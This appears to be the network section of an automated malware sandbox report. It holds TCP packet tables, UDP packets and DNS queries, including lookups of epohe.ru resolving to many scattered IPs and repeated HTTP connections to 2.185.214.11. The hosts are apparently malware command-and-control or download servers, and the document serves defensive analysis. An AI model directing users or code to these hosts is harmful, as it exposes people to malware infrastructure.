Sep 2, 2024 08:21:15.760857105 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760874987 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760953903 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761001110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761001110 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761012077 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761039972 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761178017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761224985 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761231899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761271954 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761276007 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761282921 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761322975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761467934 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761491060 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761516094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761542082 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761548996 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761562109 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761562109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761599064 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761605978 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761615038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761642933 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761648893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761688948 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.761696100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.761735916 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.763695002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.841914892 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.841976881 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842015028 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842029095 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842041016 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842051983 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842092037 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842098951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842109919 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842109919 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842137098 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842143059 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842164993 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842195034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842226028 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842240095 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842247963 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842269897 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842324018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842365980 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842370987 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842381001 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842416048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842427015 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842473030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842479944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842514038 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842514992 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842525005 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842559099 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842614889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842660904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842667103 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842699051 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842716932 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842722893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842739105 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842758894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842803955 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842811108 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842847109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842870951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842921019 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.842951059 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.842999935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843053102 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843111038 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843149900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843188047 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843296051 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843337059 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843352079 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843408108 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843466043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843499899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843513966 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843521118 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843543053 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843552113 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843696117 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843744993 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843755007 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843761921 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843775034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843789101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843806982 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843806982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843817949 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.843835115 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843859911 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.843965054 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844005108 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844013929 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844018936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844043970 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844048977 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844057083 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844063044 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844100952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844161034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844216108 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844234943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844278097 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844285965 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844291925 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.844321012 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844335079 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.844690084 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.924683094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924729109 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924766064 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924798012 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924806118 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.924823999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924860001 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.924892902 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.924906015 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924949884 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924957991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.924963951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924988031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.924992085 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925005913 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925012112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925041914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925117970 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925163031 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925169945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925204039 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925229073 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925268888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925276041 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925282001 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925303936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925309896 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925327063 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925331116 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925343990 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925353050 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925384045 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925388098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925422907 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925509930 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925549984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925553083 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925560951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925601006 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925621033 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925622940 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925633907 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925658941 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925683975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925734997 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925744057 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925782919 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925822020 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925858021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925872087 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925877094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.925895929 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.925915956 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926069021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926109076 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926150084 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926152945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926208019 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926448107 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926502943 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926675081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926712990 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926723957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926729918 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926748991 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926753998 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926789045 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926811934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926817894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926827908 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926836967 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926867008 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926872969 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926918983 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.926954985 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.926986933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927009106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927015066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927031040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927052975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927062035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927067041 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927094936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927103996 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927110910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927138090 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927155972 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927189112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927242994 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927246094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927256107 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.927299976 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.927449942 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:16.007977009 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:16.008016109 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:16.008064032 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:16.008076906 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:16.008105040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:16.008105040 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:16.008126974 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:16.008155107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:16.009438038 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:16.009454012 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:16.009483099 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:16.009489059 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:16.178534031 CEST	49745	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:16.183584929 CEST	80	49745	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:16.183667898 CEST	49745	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:16.183809042 CEST	49745	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:16.183840036 CEST	49745	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:16.188698053 CEST	80	49745	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:16.188709974 CEST	80	49745	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:17.770119905 CEST	80	49745	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:17.770139933 CEST	80	49745	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:17.770363092 CEST	49745	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:17.770584106 CEST	49745	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:17.773147106 CEST	49746	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:17.775669098 CEST	80	49745	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:17.778429031 CEST	80	49746	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:17.778512001 CEST	49746	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:17.778636932 CEST	49746	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:17.778650999 CEST	49746	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:17.783440113 CEST	80	49746	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:17.783449888 CEST	80	49746	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:18.914629936 CEST	80	49746	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:18.914645910 CEST	80	49746	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:18.914730072 CEST	49746	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:18.915013075 CEST	49746	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:18.919799089 CEST	80	49746	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:18.935209990 CEST	49747	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:18.942682981 CEST	80	49747	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:18.942918062 CEST	49747	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:18.942918062 CEST	49747	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:18.942945004 CEST	49747	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:18.951716900 CEST	80	49747	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:18.951725006 CEST	80	49747	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:20.102070093 CEST	80	49747	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:20.102097034 CEST	80	49747	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:20.102227926 CEST	49747	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:20.102350950 CEST	49747	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:20.104708910 CEST	49748	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:20.107297897 CEST	80	49747	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:20.109797001 CEST	80	49748	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:20.109863997 CEST	49748	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:20.109977961 CEST	49748	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:20.109996080 CEST	49748	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:20.114828110 CEST	80	49748	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:20.114839077 CEST	80	49748	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.026204109 CEST	80	49748	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.026231050 CEST	80	49748	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.026241064 CEST	80	49748	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.026288033 CEST	49748	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:22.026324987 CEST	49748	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:22.030730963 CEST	49748	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:22.035983086 CEST	80	49748	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.313646078 CEST	49750	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:22.319367886 CEST	80	49750	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.319449902 CEST	49750	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:22.319582939 CEST	49750	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:22.319618940 CEST	49750	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:22.325298071 CEST	80	49750	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.325571060 CEST	80	49750	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:22.459410906 CEST	49751	80	192.168.2.6	91.202.233.158
Sep 2, 2024 08:21:22.464790106 CEST	80	49751	91.202.233.158	192.168.2.6
Sep 2, 2024 08:21:22.464953899 CEST	49751	80	192.168.2.6	91.202.233.158
Sep 2, 2024 08:21:22.465679884 CEST	49751	80	192.168.2.6	91.202.233.158
Sep 2, 2024 08:21:22.470649958 CEST	80	49751	91.202.233.158	192.168.2.6
Sep 2, 2024 08:21:23.130409002 CEST	80	49751	91.202.233.158	192.168.2.6
Sep 2, 2024 08:21:23.130470991 CEST	49751	80	192.168.2.6	91.202.233.158
Sep 2, 2024 08:21:23.134284973 CEST	49751	80	192.168.2.6	91.202.233.158
Sep 2, 2024 08:21:23.139251947 CEST	80	49751	91.202.233.158	192.168.2.6
Sep 2, 2024 08:21:23.383081913 CEST	80	49751	91.202.233.158	192.168.2.6
Sep 2, 2024 08:21:23.383253098 CEST	49751	80	192.168.2.6	91.202.233.158
Sep 2, 2024 08:21:23.479399920 CEST	80	49750	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:23.479420900 CEST	80	49750	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:23.479496002 CEST	49750	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:23.479722977 CEST	49750	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:23.484616041 CEST	80	49750	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:25.146641016 CEST	49751	80	192.168.2.6	91.202.233.158

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 08:20:36.879251957 CEST	52768	53	192.168.2.6	1.1.1.1
Sep 2, 2024 08:20:37.059901953 CEST	53	52768	1.1.1.1	192.168.2.6
Sep 2, 2024 08:21:12.691606998 CEST	50949	53	192.168.2.6	1.1.1.1
Sep 2, 2024 08:21:12.775898933 CEST	53	50949	1.1.1.1	192.168.2.6
Sep 2, 2024 08:21:54.983066082 CEST	56156	53	192.168.2.6	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 2, 2024 08:20:36.879251957 CEST	192.168.2.6	1.1.1.1	0xe624	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:21:12.691606998 CEST	192.168.2.6	1.1.1.1	0x264	Standard query (0)	www.darkviolet-alpaca-923878.hostingersite.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:21:54.983066082 CEST	192.168.2.6	1.1.1.1	0xe7db	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		2.185.214.11	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		154.144.253.197	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		190.218.32.149	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		105.155.13.153	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		211.181.24.133	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		190.249.193.233	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		186.123.165.48	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		191.191.224.16	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		190.159.30.35	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:20:37.059901953 CEST	1.1.1.1	192.168.2.6	0xe624	No error (0)	epohe.ru		187.156.95.126	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:21:12.775898933 CEST	1.1.1.1	192.168.2.6	0x264	No error (0)	www.darkviolet-alpaca-923878.hostingersite.com	free.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
